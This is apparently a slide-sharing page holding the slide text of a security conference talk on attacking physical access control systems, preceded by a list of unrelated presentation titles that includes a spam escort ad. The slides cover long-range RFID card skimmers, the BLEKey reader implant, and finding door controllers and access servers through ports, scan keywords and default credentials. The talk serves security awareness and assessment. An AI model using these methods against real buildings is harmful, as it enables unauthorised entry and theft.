Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 

Valerie Thomas - All Your Door Belong to Me - Attacking Physical Access Systems

  • 1. AllYour Door Belong To Me – Attacking Physical Access Systems VALERIE THOMAS EXECUTIVE SECURITY CONSULTANT @HACKTRESS09
  • 2. • Executive Security Consultant for Securicon • 10+ years in Information Security • Coauthor of Building A Security Awareness Program • Social Engineering trainer • Physical access “enthusiast” Introduction
  • 3. Agenda • Why this talk? • Topology of a physical access system (PACS) • Why PACS deployments are insecure • Attack surfaces and exploits • Putting it all together for complete takeover
  • 4. What Is A Physical Access System? A Physical Access Systems (PACS) consists of several components working together to ensure that access is granted or denied to a controlled area when appropriate.
  • 6. PACS Components • Access control point • Door • Gate • Turnstile • Credential Reader • Credential • Access card • Electronic fob • Personal identification number (PIN) • Biometric
  • 7. Access Cards Low frequency • 125kHz • Small amount of data • Unencrypted High frequency • 13.56 MHz • Large amount of data • Sometimes encrypted
  • 9. PACS components • Access control panel • Decodes binary data • Compares card data to an access list, then grants or denies entry
  • 10. • Access control server • Software provided by manufacturer • Usually aWindows server • Maintains card records • Maintains access groups • Card format details • Event monitoring • Door components • Electric strike • Door contact • Request to exit (RTE) PACS components
  • 11. How credentials are read https://media.blackhat.com/us-13/US-13-Brown-RFID-Hacking-Live-Free-or-RFID-Hard-Slides.pdf
  • 14. The Split Personality of Security Computer Security • Protects valuable assets • Typically reports to Technology or Financial Officers • “You must be really smart” • Controls designed and implemented by network security professionals Physical Security • Protects valuable assets • Typically reports to Administration or Facilities Organization • “You’ll get a better job someday” • Controls designed and implemented by electrical contractors
  • 15. Why PACS deployments are insecure • The gap between physical and cyber security is closing • The physical security industry is ~15 years behind IT • No security maturity model • Vendors implement features without security testing • Heavily reliant on IT but lack understanding • Often deployed and forgotten
  • 16. HID iClass • The card and reader perform mutual authentication using a 64 bit encryption key • This key is programmed into the reader at the manufacture • Don’t worry - It’s encrypted! Why PACS deployments are insecure
  • 18. Physical security culture • Majority are former military/defense • Lack technical understanding of PACS • Unaccustomed to patching/addressing vulnerabilities • Vendor loyal • Resistant to change Why PACS deployments are insecure
  • 19. Attack surfaces and exploits • Access cards • Readers • Request to exit devices • Access control panel • Access control server • Workstations
  • 21.
  • 22.
  • 23.
  • 24.
  • 25. Access card attacks - Long Range • Weaponized long range reader (read & record) • Does not clone/write • Read distance is ~2ft • Available for • Proximity • iClass (Standard Security) • Indala
  • 26. PROS • Improved read range • Stores hundreds of card reads • No interaction required – just power on CONS • Expensive =( • Can misread custom card formats Access card attacks - Long Range
  • 27. Design 1 – Tastic RFID Thief
  • 28.
  • 29. Tastic RFID Thief Output File
  • 30. Tastic RFID Thief Parts list and design details: http://www.bishopfox.com/resources/tools/rfid- hacking/attack-tools/
  • 31. Design 2 - RavenHID
  • 32.
  • 33. RavenHID • BLE Mini Add-on (http://redbearlab.com) • Parts list and design details https://github.com/emperorcow/ravenhid
  • 34. Long Range Power Must have 12V Output
  • 35. Access card attacks – low tech Most vendors print the card number ONTHE CARD
  • 36. Access card attacks – low tech And on the box
  • 37. Reader attacks - BLEKey • Inserted in-line with the reader • Records card data and sends via Bluetooth • Replays data • Reader DoS
  • 38.
  • 39. Reader attacks - BLEKey Blackhat presentation https://www.blackhat.com/docs/us-15/materials/us- 15-Evenchick-Breaking-Access-Controls-With- BLEKey.pdf Parts list and software https://github.com/linklayer/BLEKey
  • 40. Request to exit device attacks
  • 41.
  • 42.
  • 43.
  • 44.
  • 45.
  • 46.
  • 47. Access control panel attacks • Remember how important door controllers are? • Medium to large environments will have multiple door controllers • These controllers are usually reachable from the general address pool • Often have very useful data
  • 48. Hunting Door Controllers • Many controllers have features to simplify configuration • Embedded web servers • FTP • SNMP • Access is generally open or protected with a weak default password • Many allow anonymous FTP
  • 49. Hunting Door Controllers Keep in mind… • These devices can be very fragile – heavy scanning is not recommended • Many of the web interfaces will only work in IE • Don’t change any settings
  • 50. Hunting Door Controllers Ports to look for • TCP 21 • TCP 23 • TCP 80 • UDP 161 • TCP 9999 Keywords in DNS/Nessus Scans • Tyco • iStar • Matrix • Lenel
  • 51. What Can Controllers Tell Us? • Card numbers and access log • Areas they control • IPs of other controllers • IPs of the access server • Passwords!
  • 57. Hunting Access Servers • Usually not as obvious as controllers • Majority areWindows Servers • Can often obtain the IP from a controller • DNS search is a fairly reliable method
  • 58. Hunting Access Servers DNS/Nessus Keywords • CCURE/C-CURE/C*CURE • OnGuard • AccessControl • FacilityCommander • Additional keywords at http://www.capterra.com/physical-security- software/
  • 59.
  • 60. Other PACS Resources PACS information and card data can be found in other areas of the network • SharePoint • Email • Document shares (usually in null session) • Guard workstations
  • 61. Putting it all together • Long range reader to collect card data • Programmed duplicate cards and created fake employee card • Observed security guard daily activity
  • 62. Putting it all together • Placed hardware keyloggers • Captured credentials and other useful data • Gained access to access server • Produced duplicate cards for employees with the most access
  • 63. Putting it all together
  • 64. Putting it all together
  • 66. Long road ahead • Physical security has a lot of catching up to do • Will require huge culture shift • Many of the misconfigurations discussed are preventable • PACS security checklist (in progress)

Notas del editor

  1. How to get card data at longer range (rather than “bumping” or gaining physical access to the card itself.